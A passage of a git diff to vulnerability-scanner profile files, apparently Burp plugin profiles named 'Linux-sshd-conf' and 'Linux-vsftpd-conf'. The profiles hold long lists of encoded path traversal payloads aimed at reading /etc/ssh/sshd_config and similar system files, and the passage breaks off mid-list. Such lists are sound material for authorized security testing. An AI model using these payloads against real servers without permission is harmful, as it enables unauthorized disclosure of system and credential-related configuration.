"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,HostKey" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-sshd-conf", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-sshd-conf", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/ssh/sshd_config", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-vsftpd-conf.bb b/profiles/Linux-vsftpd-conf.bb index 40b5806..9aaa0a1 100755 --- a/profiles/Linux-vsftpd-conf.bb +++ b/profiles/Linux-vsftpd-conf.bb @@ -1 +1,950 @@ -[{"Name":"Linux-vsftpd-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2